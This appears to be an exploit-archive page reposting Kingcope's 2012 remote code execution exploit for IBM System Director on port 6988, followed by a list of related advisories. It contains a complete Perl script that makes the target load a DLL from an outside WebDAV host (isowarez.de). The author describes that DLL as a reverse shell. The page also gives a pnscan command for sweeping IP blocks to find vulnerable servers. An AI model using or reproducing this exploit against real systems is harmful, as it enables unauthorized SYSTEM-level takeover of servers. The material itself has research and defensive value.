Lucene search
KingcopePACKETSTORM:118549HistoryDec 03, 2012 - 12:00 a.m.
IBM System Director Remote DLL Load
2012-12-0300:00:00
Kingcope
packetstormsecurity.com
30
EPSS
0.405
Percentile
97.3%
`IBM System Director Remote System Level Exploit (CVE-2009-0880 extended zeroday)
Copyright (C) 2012 Kingcope
IBM System Director has the port 6988 open. By using a special request
to a vulnerable server,
the attacker can force to load a dll remotely from a WebDAV share.
The following exploit will load the dll from
\\isowarez.de\\director\wootwoot.dll
the wootwoot.dll is a reverse shell that will send a shell back to the
attacker (the code has to be inside the dll initialization routine).
The IBM Director exploit works on versions 5.20.3 and before, but not
on 5.2.30 SP2 and above.
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0880
There was a prior CVE for it, the CVE states the attack can load local
files only, using the WebDAV server remote file can be loaded too.
To scan for this software you can enter the following (by using pnscan):
./pnscan -w"M-POST /CIMListener/ HTTP/1.1\r\nHost:
localhost\r\nContent-Length: 0\r\n\r\n" -r HTTP <ipblock> 6988
Exploit:
---snip---
use IO::Socket;
#1st argument: target host
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "6988",
Proto => 'tcp');
$payload =
qq{<?xml version="1.0" encoding="utf-8" ?>
<CIM CIMVERSION="2.0" DTDVERSION="2.0">
<MESSAGE ID="1007" PROTOCOLVERSION="1.0">
<SIMPLEEXPREQ>
<EXPMETHODCALL NAME="ExportIndication">
<EXPPARAMVALUE NAME="NewIndication">
<INSTANCE CLASSNAME="CIM_AlertIndication" >
<PROPERTY NAME="Description" TYPE="string">
<VALUE>Sample CIM_AlertIndication indication</VALUE>
</PROPERTY>
<PROPERTY NAME="AlertType" TYPE="uint16">
<VALUE>1</VALUE>
</PROPERTY>
<PROPERTY NAME="PerceivedSeverity" TYPE="uint16">
<VALUE>3</VALUE>
</PROPERTY>
<PROPERTY NAME="ProbableCause" TYPE="uint16">
<VALUE>2</VALUE>
</PROPERTY>
<PROPERTY NAME="IndicationTime" TYPE="datetime">
<VALUE>20010515104354.000000:000</VALUE>
</PROPERTY>
</INSTANCE>
</EXPPARAMVALUE>
</EXPMETHODCALL>
</SIMPLEEXPREQ>
</MESSAGE>
</CIM>};
$req =
"M-POST /CIMListener/\\\\isowarez.de\\director\\wootwoot HTTP/1.1\r\n"
."Host: $ARGV[0]\r\n"
."Content-Type: application/xml; charset=utf-8\r\n"
."Content-Length: ". length($payload) ."\r\n"
."Man: http://www.dmtf.org/cim/mapping/http/v1.0 ; ns=40\r\n"
."CIMOperation: MethodCall\r\n"
."CIMExport: MethodRequest\r\n"
."CIMExportMethod: ExportIndication\r\n\r\n";
print $sock $req . $payload;
while(<$sock>) {
print;
}
---snip---
Cheerio,
Kingcope
`
Related
securityvulns
securityvulns
IBM Director code execution
2012-12-09 00:00:00
nvd
nvd
CVE-2009-0880
2009-03-12 15:20:49
openvas
openvas
zdt
zdt
IBM System Director Remote System Level Exploit
2012-12-02 00:00:00
IBM System Director Agent DLL Injection Vulnerability
2012-12-07 00:00:00
packetstorm
packetstorm
IBM System Director Agent DLL Injection
2012-12-07 00:00:00
seebug
seebug
IBM System Director Remote System Level Exploit
2014-07-01 00:00:00
IBM Director CIM服务器本地权限提升漏洞
2009-03-14 00:00:00
exploitpack
exploitpack
IBM System Director Agent - Remote System Level
2012-12-02 00:00:00
prion
prion
Directory traversal
2009-03-12 15:20:00
exploitdb
exploitdb
IBM System Director Agent - DLL Injection (Metasploit)
2012-12-07 00:00:00
IBM System Director Agent - Remote System Level
2012-12-02 00:00:00
IBM System Director Agent 5.20 - CIM Server Privilege Escalation
2009-03-10 00:00:00
metasploit
metasploit
IBM System Director Agent DLL Injection
2012-12-06 15:43:07
cve
cve
CVE-2009-0880
2009-03-12 15:20:49
cvelist
cvelist
CVE-2009-0880
2009-03-12 15:00:00
kaspersky
kaspersky
KLA10198 Multiple vulnerabilities in IBM Director
2009-03-12 00:00:00